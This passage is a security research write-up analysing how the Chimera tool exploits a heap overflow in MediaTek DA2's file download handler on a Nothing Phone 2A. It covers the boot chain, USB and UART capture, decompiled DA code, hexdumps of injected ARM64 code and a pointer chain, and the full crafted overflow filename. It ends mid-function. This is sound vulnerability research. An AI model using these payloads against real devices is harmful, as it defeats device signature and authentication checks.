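        "version": version,
        "soc_count": count,
    }

# Synthetic header, built only to exercise the parser.
fake = HEADER.pack(b"MTK_DOWNLOAD_AGENT", b"example", 4, 0, 2)
print(parse_da_header(fake))
```

Under the same assumption, the per-chipset DA entries would start right after these 0x6C bytes.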

DA1 and DA2

DA1: Handles early hardware initialization (PLL, PMIC, storage, DRAM) and USB communication setup. Its main job is to prepare the device and load DA2.
DA2: Runs a small multithreaded kernel and handles the actual device operations: flashing, reading partitions, security checks, and everything else you'd expect from a flash tool.

heapb8 targets DA2, specifically its USB file download handler.

Uploading the DA(s)

MediaTek has 3 different security mechanisms in both BootROM and Preloader:

Secure Boot Control (SBC): Controls whether the current stage verifies the next stage of the boot chain. For BootROM, this means verifying Preloader. For Preloader, this means verifying LK or bl2_ext based on a security policy table.
Serial Link Authorization (SLA): Authenticates the host before allowing operations. There are two types:
- BROM SLA: The BootROM sends a challenge that must be signed with an OEM-held key. MediaTek's implementation is a bit unusual: instead of standard RSA signing, they swap the public and private exponents.
- DA SLA: Introduced in V5 (raphael). If the DA is compiled with DA_ENABLE_SECURITY, most commands are locked behind authentication. The host must call CMD_SECURITY_GET_DEV_FW_INFO to get device info, sign it, then call CMD_SECURITY_SET_FLASH_POLICY with the signed response. If valid, the DA registers the protected commands. You can check if DA SLA is enabled by reading the DA.SLA system property.
Download Agent Authentication (DAA): Verifies the DA's signature before loading it. This is done by checking the signature appended to the DA against a trusted key before allowing execution.

After handshaking (and BROM SLA if enabled), the host issues CMD_SEND_DA (0xD7) to upload DA1. If DAA is enabled, the signature is verified before setting the g_da_verified flag.

The host then issues CMD_JUMP_DA (0xD5) to transfer execution, but only if g_da_verified is set, otherwise the device asserts and reboots.

Once DA1 is running, a similar process repeats: DA1 verifies and loads DA2 using CMD_BOOT_TO, then jumps to it.
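The CMD_SEND_DA / CMD_JUMP_DA gate described above boils down to a single flag. Here's a toy Python model of it. The class and method names are hypothetical, and the behavior with DAA disabled (flag set without any check) is an assumption, since the text only covers the DAA-enabled case:

```python
class DownloadStage:
    """Toy model of the CMD_SEND_DA / CMD_JUMP_DA gate."""

    def __init__(self, daa_enabled):
        self.daa_enabled = daa_enabled
        self.da_verified = False  # stands in for g_da_verified

    def send_da(self, signature_valid):
        # Assumption: with DAA disabled the flag is set without a check.
        self.da_verified = signature_valid or not self.daa_enabled

    def jump_da(self):
        if not self.da_verified:
            raise RuntimeError("assert and reboot")
        return "DA running"


stage = DownloadStage(daa_enabled=True)
stage.send_da(signature_valid=False)
try:
    stage.jump_da()
except RuntimeError as err:
    print(err)  # assert and reboot
```

With DAA on, an unsigned DA never gets past the jump, which is why the interesting bugs are the ones that sidestep this check.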

Chimera

Our target was relatively clear: figure out how Chimera was exploiting patched DAs. The first step was to capture USB traffic between Chimera and a target device.

For our target, we went with the Nothing Phone 2A. It runs a MediaTek Dimensity 7200 Pro and is listed under Chimera's supported devices.

Chimera is one of the more "premium" GSM tools out there, and it shows: VM detection, USB packet capture detection, and various other anti-analysis techniques make it clear the developers have put real effort into preventing reverse engineering.

USB Capture

Chimera's anti-analysis means you can't just fire up Wireshark and start capturing packets. Instead, we relied on a physical USB sniffer to capture traffic between Chimera and the device.

We've used this device before and it works well, though I'll admit it's absurdly expensive. You could probably hack together a cheaper alternative, but that's a project for another day.

UART

Capturing USB traffic is only half the battle; we also needed to see what the DA was doing on the device itself. For that, we used UART.

Thankfully, @AntiEngineer had already spent hours probing the board with a logic analyzer to find the UART pins. He put together a nice setup that proved invaluable for this research.

On the Nothing Phone 2A, UART is accessible through two small pads behind the main camera module:

Motherboard	UART pins

BROM outputs UART at 115200 8N1, while everything that comes after (Preloader, DAs, etc.) runs at 921600 8N1 by default.

We used a cheap TTL-USB adapter to connect the pads to our computer. For serial interaction, I personally recommend tio.

One annoying quirk about this device (and probably many others) is that UART logs get cut off during Preloader initialization as soon as you see the Log Turned Off. message.

This is controlled by a global variable called g_log_switch. During boot, the Preloader checks if a certain key combination is held (usually volume up or down) and sets the switch accordingly.

If the switch is off, outchar() skips calling PutUARTByte() entirely, so nothing gets printed. The logs are still written to a DRAM buffer, but you won't see them over UART:

static void outchar(const char c)
{
    if (g_log_disable) {
        if (log_ptr < log_end)
            *log_ptr++ = (char)c;
        else
            g_log_miss_chrs++;
    } else {
        if (get_log_switch()) {
            PutUARTByte(c);
#if (CFG_DRAM_LOG_TO_STORAGE)
            log_to_storage(c);
#endif
        }
        pl_log_store(c);
    }

#if (CFG_OUTPUT_PL_LOG_TO_UART1)
    PutUART1_Byte(c);
#endif
}

Getting the Capture

With our capture environment set up, we proceeded to capture a full Chimera session. I'd like to thank @erdilS for lending us his Chimera license for this research :)!

The tool is expensive, and I wasn't about to spend that much money for what was supposed to be a simple one-off analysis (spoiler: it wasn't :D).

The capture uses a proprietary format that can only be opened with Total Phase's Data Center software. It's not as fancy as Wireshark, but it gets the job done.

Dissecting the Exploit

With the capture in hand, it was time to figure out what Chimera was actually doing.

The plan was simple, or so we thought: extract the DAs, compare them against known good copies, and trace through the USB traffic to find where things get interesting.

Extracting the DAs

The first thing we did was extract both DAs from the capture and compare them against the ones we had previously dumped from the official Nothing Flash Tool.

The hashes matched, so Chimera is using unmodified DAs with the same build date as the official tool:

============================================================
DA Header Type: V6
Number of SoCs: 1
============================================================
[SoC 0]
  DA Mode: V6
  HW Code     : 0x1229
  HW Sub Code : 0x8A00
  Magic       : 0xDADA
  Regions     : 3
  Region 0: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 1: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 2: Offset: 0x96EBC, Length: 0x59930, Addr: 0x40000000, Region Length: 0x59830, Sig Len: 0x100

Thanks to this, we know we're dealing with a V6 DA built for HW code 0x1229 (Dimensity 7200 / 7200 Pro). To load them in Ghidra, use base address 0x2000000 for DA1 and 0x40000000 for DA2.
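The numbers in the region table are internally consistent, which is handy when carving the stages out of the DA file by hand. Here's a small sketch that checks this and splits a region into payload and signature. The `Region` class and `split_region` helper are hypothetical, and reading "Length = Region Length + Sig Len" into the table is our interpretation of the values above, not something taken from a spec.

```python
from dataclasses import dataclass


@dataclass
class Region:
    offset: int          # file offset of the region
    length: int          # bytes stored in the file
    addr: int            # load address
    region_length: int   # payload bytes (assumed to exclude the signature)
    sig_len: int         # trailing signature bytes


# Values copied from the header dump above.
REGIONS = [
    Region(0xBC, 0x96E00, 0x2000000, 0x96D00, 0x100),
    Region(0xBC, 0x96E00, 0x2000000, 0x96D00, 0x100),
    Region(0x96EBC, 0x59930, 0x40000000, 0x59830, 0x100),
]


def split_region(blob, region):
    """Return (payload, signature) for one region of a DA file."""
    data = blob[region.offset:region.offset + region.length]
    return data[:region.region_length], data[region.region_length:]


for r in REGIONS:
    # Each stored length is the payload plus a 0x100-byte signature.
    assert r.length == r.region_length + r.sig_len

# DA2 starts right where DA1 ends in the file.
assert REGIONS[1].offset + REGIONS[1].length == REGIONS[2].offset
```

The payload returned for region 2 is what gets loaded at 0x40000000 in Ghidra; the trailing 0x100 bytes are the signature and can be left out.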

One thing worth noting is that V6 DAs can run in either ARM64 or ARM32 (non-THUMB) mode, which made porting the exploit a bit annoying later on.

In our specific case, both stages are ARM64, so we analyze them as AARCH64 (ARMv8) Little Endian.

Tracing the USB Traffic

We started by analyzing the full boot sequence: Preloader receiving DA1 over USB, verifying its signature, and jumping to it.

Then DA1 does the same for DA2: receives it, verifies it, and transfers execution. Nothing unusual there, everything looked standard (mind you, we really wasted an entire night analyzing ~37100 packets of boring USB traffic).

While running Chimera, I also tried to catch UART logs hoping for some useful debug output, but it ended up being useless. They set the log level to ERROR right after DA1 starts using CMD:SET-RUNTIME-PARAMETER:

<?xml version="1.0" encoding="UTF-8"?>
<da>
    <version>1.0</version>
    <command>CMD:SET-RUNTIME-PARAMETER</command>
    <arg>
        <checksum_level>NONE</checksum_level>
        <da_log_level>ERROR</da_log_level>
        <log_channel>UART</log_channel>
        <battery_exist>AUTO-DETECT</battery_exist>
        <system_os>LINUX</system_os>
    </arg>
    <adv>
        <initialize_dram>YES</initialize_dram>
    </adv>
</da>

This basically tells both DA1 and DA2 not to spit logs to UART unless they're errors, so instead of useful debug traces, we got mostly silence:

***dagent_command_loop:***

@Protocol: Tx START-CMD(<?xml version="1.0" encoding="utf-8"?><host><version>1.0</version><command>CMD:START</command></host>)

@Protocol: Rx Host CMD(<?xml version="1.0" encoding="UTF-8"?><da><version>1.0</version><command>CMD:SET-RUNTIME-PARAMETER</command><arg><checksum_level>NONE</checksum_level><da_log_level>ERROR</da_log_level><log_channel>UART</log_channel><battery_exist>AUTO-DETECT</battery_exist><system_os>LINUX</system_os></arg><adv><initialize_dram>YES</initialize_dram></adv></da>)

@Protocol: Execute CMD(CMD:SET-RUNTIME-PARAMETER)
[SPMI] spmi_init_1 done
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
Not BOOT_TRAP_EMMC_UFS
Host notice error or user canceled.
Unsupported command.m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
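When going through thousands of packets, it helps to pull the command name and arguments out of each XML blob automatically. Here's a minimal sketch using Python's standard `xml.etree.ElementTree` on the `CMD:SET-RUNTIME-PARAMETER` command shown earlier. The `parse_da_command` helper is a hypothetical name, and this is just one way to do it, not how our tooling or Chimera handles it.

```python
import xml.etree.ElementTree as ET

# The command captured right after DA1 starts (whitespace removed).
RAW = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b"<da><version>1.0</version>"
    b"<command>CMD:SET-RUNTIME-PARAMETER</command>"
    b"<arg><checksum_level>NONE</checksum_level>"
    b"<da_log_level>ERROR</da_log_level>"
    b"<log_channel>UART</log_channel>"
    b"<battery_exist>AUTO-DETECT</battery_exist>"
    b"<system_os>LINUX</system_os></arg>"
    b"<adv><initialize_dram>YES</initialize_dram></adv></da>"
)


def parse_da_command(raw):
    """Return (command name, {argument: value}) for a host-to-DA XML command."""
    root = ET.fromstring(raw)
    command = root.findtext("command")
    arg = root.find("arg")
    args = {child.tag: child.text for child in arg} if arg is not None else {}
    return command, args


command, args = parse_da_command(RAW)
print(command, args["da_log_level"])
```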

Going back to the USB capture, the interesting stuff only started happening once DA2 was fully loaded.

At first glance, we noticed that the very first thing Chimera did was issue two CMD:SECURITY-SET-ALLINONE-SIGNATURE commands, but one of them looked slightly off.

A quick look at the capture revealed the following sequence:

Send CMD:SECURITY-SET-ALLINONE-SIGNATURE with a normal filename
Send the AIO file data (which looks like ARM64 code, not a real signature)
Send another CMD:SECURITY-SET-ALLINONE-SIGNATURE with an absurdly long filename full of special characters
Send a second AIO file
Intentionally trigger an error by not sending the expected ACK

This was clearly deliberate. But why send two AIO commands? And what's with the weird filename?

The AIO command

To understand what's going on, we analyzed what CMD:SECURITY-SET-ALLINONE-SIGNATURE is supposed to do:

int cmd_security_set_all_in_one_signature(com_channel_struct *channel,char *xml)
{
  int status;
  mxml_node_t *tree;
  char *file_name;
  uint32_t all_in_one_sig_sz;
  uint8_t *all_in_one_sig;
  
  tree = mxmlLoadString((mxml_node_t *)0x0,xml,MXML_OPAQUE_CALLBACK);
  if (tree == (mxml_node_t *)0x0) {
    status = -0x3ffeffff;
    set_error_msg("Required XML node path not found. Check command string.");
  }
  else {
    file_name = mxmlGetNodeText(tree,"da/arg/source_file");
    if (file_name == (char *)0x0) {
      status = -0x3ffeffff;
      set_error_msg("Required XML node path not found. Check command string.");
    }
    else {
      all_in_one_sig = (uint8_t *)0x0;
      all_in_one_sig_sz = 0;
      status = fp_read_host_file(channel,file_name,&all_in_one_sig,&all_in_one_sig_sz, "Signature");
      if (status < 0) {
        free(all_in_one_sig);
      }
      else {
        set_all_in_one_signature_buffer(all_in_one_sig,all_in_one_sig_sz);
      }
    }
    mxmlDelete(tree);
  }
  return status;
}

The command first parses the XML using mxmlLoadString (which allocates memory for the parsed tree), then extracts the source_file argument and calls fp_read_host_file to download that file from the host.

Looking at fp_read_host_file, we can see it allocates a buffer for the incoming data if the passed pointer is null:

int fp_read_host_file(com_channel_struct *channel, char *file_name, char **ppdata,
                      uint32_t *pdata_len, char *info)
{
  // ... escape filename and send download request to host ...
  
  // read total length from host
  bytes_read = (*channel->read)(buf_total_length, &length);
  if (bytes_read == 0) {
    // ... parse response ...
    total_length = atoll(vec[1]);
    total_len = (uint)total_length;
    
    if ((*ppdata == (char *)0x0) || (*pdata_len == 0)) {
      // allocate buffer for file data
      *pdata_len = total_len;
      error_msg = (char *)malloc(total_length + 4 & 0xffffffff);
      *ppdata = error_msg;
      if (error_msg != (char *)0x0) goto consume_data;
      // ...
    }
    
consume_data:
    (*channel->write)((uint8_t *)"OK", 3);
    // ... read file data into buffer ...
  }
  // ...
}

Back in cmd_security_set_all_in_one_signature, if fp_read_host_file returns an error, the allocated buffer gets freed.

Otherwise, set_all_in_one_signature_buffer stores it in a global variable. Either way, mxmlDelete(tree) cleans up the XML tree at the end.

In normal usage, this command provides the DA with an "all-in-one" signature file containing cryptographic signatures for every partition on the device, allowing the DA to verify images during flashing without needing separate signature files for each partition.

The first CMD:SECURITY-SET-ALLINONE-SIGNATURE Chimera sends looks perfectly normal, except the file content doesn't look like a valid AIO signature at all:

00000000  fd 7b be a9 f3 0b 00 f9  fd 03 00 91 b3 02 00 f0  |.{..............|
00000010  73 02 1b 91 e0 03 13 aa  f5 35 00 94 e0 03 13 aa  |s........5......|
00000020  f3 0b 40 f9 fd 7b c2 a8  c0 03 5f d6 e0 03 13 aa  |..@..{...._.....|
00000030  e8 03 00 aa e8 03 00 f0  08 e9 43 b9 08 41 00 51  |..........C..A.Q|
... more lines omitted for brevity ...

The astute reader will notice this looks suspiciously like ARM64 instructions. The first four bytes fd 7b be a9 correspond to the typical function prologue stp x29, x30, [sp, #-0x20]!.
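If you don't have a disassembler at hand, the first word is easy enough to decode manually. The sketch below handles only the 64-bit pre-indexed `stp` form and is meant as an illustration of the encoding, not a general disassembler; `decode_stp_pre_index` is a hypothetical helper.

```python
import struct


def _xreg(n):
    """Name of a 64-bit data register (register 31 reads as xzr here)."""
    return "xzr" if n == 31 else f"x{n}"


def decode_stp_pre_index(word):
    """Return the assembly text for a 64-bit pre-indexed STP, or None."""
    # Bits 31..22 of "stp Xt, Xt2, [Xn|sp, #imm]!" are fixed: 10 101 0 011 0
    if (word >> 22) != 0b1010100110:
        return None
    imm7 = (word >> 15) & 0x7F
    if imm7 & 0x40:              # sign-extend the 7-bit immediate
        imm7 -= 0x80
    offset = imm7 * 8            # scaled by the register size (8 bytes)
    rt2 = (word >> 10) & 0x1F
    rn = (word >> 5) & 0x1F
    rt = word & 0x1F
    base = "sp" if rn == 31 else f"x{rn}"   # base register 31 means sp
    sign = "-" if offset < 0 else ""
    return f"stp {_xreg(rt)}, {_xreg(rt2)}, [{base}, #{sign}{abs(offset):#x}]!"


# First four bytes of the file, read as a little-endian 32-bit word.
first_word = struct.unpack("<I", bytes.fromhex("fd7bbea9"))[0]
print(hex(first_word), decode_stp_pre_index(first_word))
```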

The second AIO file was equally strange: a bunch of what looked like pointers, possibly a ROP chain?

00000000  cc 24 06 40 00 00 00 00  cc 24 06 40 00 00 00 00  |.$.@.....$.@....|
00000010  34 ec 03 40 00 00 00 00  f4 f7 02 40 00 00 00 00  |4..@.......@....|
00000020  00 ac 05 40 00 00 00 00  9c a7 00 40 00 00 00 00  |...@.......@....|
00000030  f0 f1 01 40 00 00 00 00  3c e8 02 40 00 00 00 00  |...@....<..@....|
... more lines omitted for brevity ...
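A quick way to sanity-check the "these look like pointers" hunch is to unpack the bytes as little-endian 64-bit values and compare them against DA2's load range. This is only a sketch: the base and region length come from the DA header dump, and `in_da2_image` is a hypothetical helper. Values slightly past the loaded region could still belong to DA2's data or .bss, so the check is a hint, not proof.

```python
import struct

DA2_BASE = 0x40000000        # DA2 load address from the header dump
DA2_REGION_LEN = 0x59830     # DA2 region length from the header dump

# First 64 bytes of the second AIO file, copied from the hexdump above.
DUMP = bytes.fromhex(
    "cc24064000000000cc24064000000000"
    "34ec034000000000f4f7024000000000"
    "00ac0540000000009ca7004000000000"
    "f0f10140000000003ce8024000000000"
)


def qwords(blob):
    """Interpret a byte string as consecutive little-endian 64-bit values."""
    return [value for (value,) in struct.iter_unpack("<Q", blob)]


def in_da2_image(value):
    """True if the value points inside the loaded DA2 region."""
    return DA2_BASE <= value < DA2_BASE + DA2_REGION_LEN


for value in qwords(DUMP):
    print(f"{value:#x} in_image={in_da2_image(value)}")
```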

Little did we know, most of both files were just padding or junk data that Chimera added to confuse analysis. More on that later.

At this point, we weren't sure what any of this meant. But the weird filename in the second command was the more obvious lead.

For the second command, Chimera sent an absurdly long filename full of special characters:

<?xml version="1.0" encoding="UTF-8"?><da><version>1.0</version><command>CMD:SECURITY-SET-ALLINONE-SIGNATURE</command><arg><source_file>
;;;;;;;;;;;;;;;;&gt;;;;;&gt;;;;;;;;&amp;;;;;&quot;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;;&amp;;&amp;;;;;;;;;;;;;;;&lt;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&amp;;;&gt;&lt;;&quot;;&amp;;;;;;;&gt;;;;;;;;;;;&quot;;&amp;;;;;;;;;&amp;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;&amp;;;&lt;;;&lt;;;;;;&amp;&lt;;;;;;;;;;;;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;&lt;;;;;;&quot;;;;;;;;;;;&amp;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;&quot;&quot;;;;;&quot;;;;;;;&quot;;;;;;;;;;;&gt;&gt;;;;;;&quot;;;;;;;;&quot;;&amp;;;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;&gt;;;;;;;;;;&quot;;&gt;;;;;;&quot;;&gt;;;;;;;;;;&quot;;&amp;;;;&quot;;;&gt;&lt;;;;;;;;;;&lt;;;;;;;;&gt;;;;;;;;;;;&quot;;;;;;;;&gt;;;;;;;;;;;&amp;&gt;&quot;;&quot;;;;;;;;;;;;;&quot;;;&lt;;;;;;;;&amp;&gt;;;;;;;&amp;;;;;;;;&amp;;;;&lt;;;;&lt;;;&amp;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&amp;;&amp;;;;;;;;;;;;;;;&amp;;;&lt;;;;;;;;;;;;&quot;&gt;;;;;&quot;;;;;;;&quot;;&quot;;;;;&lt;;&lt;;;;;;;&amp;&gt;;&lt;&quot;;;;;;;&amp;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;&quot;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;&amp;;;&lt;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;&lt;;;;;;&lt;&amp;;;;;;&lt;&amp;;&amp;;;;;;;&lt;;;&quot;;;;;&gt;;;;&quot;;;;;&amp;;;&amp;;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;&amp;&gt;;;&gt;&lt;;;;;;;;;;;;;&lt;;;&amp;;;;;;;;;;;;&lt;;;&lt;;;&quot;;;;;;;&quot;;;;;;;;;;;;&amp;;;;&amp;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;&quot;;;&lt;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;&lt;&quot;;;;;;;&gt;;;;;;;&amp;;;&amp;;;;;;;&lt;;;;;;;;;;;;&lt;;;;;;;;;;&lt;;&gt;;;;;;;;&gt;;;;;;;&lt;;;;;;&quot;;;;;&gt;&lt;;;;;;;;;;;;&amp;;;;;;;;;&lt;;;;;;;;;&quot;;;;;;&amp;;;;;&amp;&quot;;&amp;;;;;;;;;&gt;;;;;&gt;&lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;&gt;;;&lt;;;&gt;;;;;&amp;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;&gt;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;&gt;;&amp;;;;;;;;;;;;;;;&gt;;;;;;;&gt;;;;;;;;&amp;;&quot;;;;;;;;;;;;;;;;;;;;;;&quot;;&gt;;;&
gt;;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;;&amp;;;&quot;;;;;&gt;;;;;;;;;;;;&amp;;;&quot;&gt;;;;;;;;;;;;;;&lt;;;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;&gt;;&lt;;;;&lt;;;;;;;;;&lt;;;;;&quot;;&lt;&quot;;;;;;;;;;;;;&lt;;;;;&gt;;;;;;&amp;;;;;;;;;;;;;;;;&gt;;;;;;;&quot;;;;;;;;&quot;;;&quot;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;&lt;&gt;;;;;;;;;;;;;;&amp;;;;;;;&gt;;&amp;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&lt;;;;;;;;;;;&lt;;;;&quot;;;&lt;;;;;;;;;;;;;;;;&quot;&lt;;;;;;;;&gt;;;;;&lt;;;;;;;;;;;;;&gt;;;;&quot;;;&gt;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;&amp;;;;;&quot;;;;;;;&amp;&quot;;;;&quot;;;;;;;&quot;;&lt;;&lt;;&gt;;;;;;;;;;&amp;;;;;&amp;;;&lt;&lt;&gt;&amp;;&gt;;;&lt;;;;;;;;;;;&quot;;&lt;;;;;&amp;;;;;;;;;;&amp;;;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;&quot;;;;&amp;&lt;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;&lt;;;;;;&amp;;;;;;;;;&gt;;;&quot;;;;;;;;;;;;;;;;;&amp;;;;;;;&lt;;;;;;;;;&lt;;&gt;&quot;;;;;&amp;&amp;;;;;;;;;;&amp;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&amp;;;&lt;;;&quot;;;;;&gt;;;&quot;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;&gt;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;&amp;;;;;;;;;;;;;;&quot;;;;;;;;&gt;;;;;;;;;;;;;;&gt;;;;;;;&gt;&quot;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;&quot;;;;;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;;;&gt;&lt;;;;;;;;;;&amp;;;;;;;;&quot;;;;;;;&lt;;;;;;;;;&gt;;;;;;;;;;;;;;;&lt;;;;;;;;&lt;;;;;;;;;;;;&amp;;;&amp;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;&quot;;;&quot;;&gt;;&amp;;;;&quot;;;;;;;&lt;;;;;;;&quot;;;;;;;;;;;;;;&quot;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;;;;&gt;;;&quot;;&quot;;;;;;;;;;&gt;;&quot;;;&quot;&quot;&lt;;;;&gt;;;;;;;;;;;;;;;;;;;;&gt;;;;;;;;&gt;;;;;;;;;;;;;;;;;&lt;;&quot;;;&gt;;;;;;;;;&amp;;;;;;;;;;;;;&amp;;;;;;;;;;&amp;;;;;;;;;;&quot;;&lt;;;;;;;;;;;&gt;;;;;;&lt;;;;;;&amp;;;;;;&gt;;;;;&amp;;;;;;&amp;;;&quot;;;;;;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&gt;;;;;&gt;&lt;;;;;&gt;;;;;;;;;;;;;;;;;;;&
lt;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;&lt;&amp;;;;;;;&amp;;;;;;;;;;;;;&gt;;;;;;&amp;;;;;;;;;&gt;;;;&amp;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;&gt;&quot;;;;;&amp;;;;;&amp;&quot;&quot;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;;;;&lt;&amp;;;;;;;&lt;;;;;;;;;;&lt;;;;;;;;;;&amp;;;;;;;;;&quot;&gt;;;;;;;;;;;&lt;&quot;;;;;;&lt;;;;;;;;;;;;&quot;&amp;;;&quot;&lt;;&quot;;&quot;;&quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&quot;;;;&amp;;;;&lt;;&quot;;;;;;;;;;;&lt;;;;&quot;;;;;;;;;;;;;;;&lt;&lt;&lt;;;;;;;&lt;;&quot;;;&amp;;;;;;;;&quot;&amp;;;&amp;;;;;;;&amp;;;&gt;;&quot;;;;;;;;;;;;;&quot;;;;;;;;&lt;;;;;;;;;;&lt;;;;;;;;;;&amp;;;&quot;&quot;;;;;;;;;;;;;;;;;;;;;&quot;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&quot;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;&lt;;;;;&quot;;;;;;;;;;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;&quot;;;;;&amp;&quot;&amp;;&amp;;;;;;;;;;;;;;&quot;;;;;;;;;;;;&gt;;;;;;;;;;&quot;;&amp;;&gt;;&gt;;;;;&amp;;;;&lt;;;;;;;;;;&amp;;;;;;;&amp;;;;;;;;;;;;;;;;;&quot;&quot;;;;;;;;;&gt;;&lt;;;;;;;;;;;;&quot;;;&gt;&amp;;&lt;;;;;;&lt;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&amp;;;&amp;;;;;;;&gt;;;&lt;;;;;;&lt;;;;;;;;;;;;;;;;;;;;;;;&quot;;;&amp;&amp;;&amp;;;;;;;&amp;;&gt;;&quot;;;;;;;;;;;;;;&amp;;;;;;&lt;;;;;;;;;&gt;;;&lt;;;;;;;;;;;;;;;;;&quot;;;;;;;;;&amp;;;;;;;;;;;&quot;;;;;;&quot;;;;;;&gt;;;;;&amp;;;;;;;;;;;;&amp;;&amp;;;;;;&amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;;;;&lt;;;;;;;;&gt;;;;;;&quot;;;;&quot;;;;;;;&quot;;;;;;;;;;;;;;&lt;;;&amp;&amp;&gt;;;;;;;&amp;;;;;;;;&quot;;;;;;;;;&gt;;;;;;;;;&quot;;&lt;;&amp;;;;&amp;;;;;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;&quot;;;;&quot;;;;;;;&gt;;&amp;;;;;&gt;&lt;;;;;&gt;;;;&amp;;;&quot;;;;;;;;;;;;;&quot;;;;;;;;;;;;;;;;;;;;;&amp;;;;;&gt;;;&amp;;&gt;;&gt;;;;&quot;;;;&amp;;;;;;;&quot;;;;;;;;;;&gt;;&gt;;&quot;;;;;;;;;;;;;;&amp;;;;;;&gt;&quot;;;;;;;;;;;&lt;;;;;&quot;;;;;;;&gt;;;;;;;;;&lt;;;;;;;;;;;;;;&gt;;;;&gt;;;;;;;;;;&amp;;;;;&lt;;;;&quot;;;;;;;&gt;;;;;;&lt;;;;;;;;;;;;;;;;;&gt;;;;;;;;;;;;;;;;;&lt;;;;;;;;;;;;;;;;;;;&lt;;;;;;;&quot;&quot;;;;
;;;;;&gt;;;;;;&gt;;&gt;;;&lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&lt;;&gt;;;&amp;&amp;;;&gt;&lt;;;;
</source_file></arg></da>

This quickly caught our attention, so we decided to check what the DA was doing with the name.

XML Expansion

Like we mentioned before, the AIO command invokes fp_read_host_file to download the specified file from the host. But before initiating the transfer, the function calls mxml_escape on the filename to sanitize it for XML:

filename_len = strnlen(file_name, 0x200);
escaped_xml = mxml_escape(file_name, (uint32_t)filename_len);
bytes_read = snprintf((char *)(result + 0x40), XML_CMD_BUFF_LEN,
    "<?xml version=\"1.0\" encoding=\"utf-8\"?><host>..."
    "<source_file>%s</source_file>...</host>",
    error_msg, buf, escaped_xml, (ulong)package_Len);

The problem is in mxml_escape. It allocates a fixed 512-byte buffer (0x200) and expands special XML characters without any bounds checking:

char *mxml_escape(char *src, uint32_t len)
{
  byte bVar1;
  char *pcVar2;
  byte *dest;
  byte *pbVar3;
  ulong uVar4;

  if ((_dest == (byte *)0x0) &&
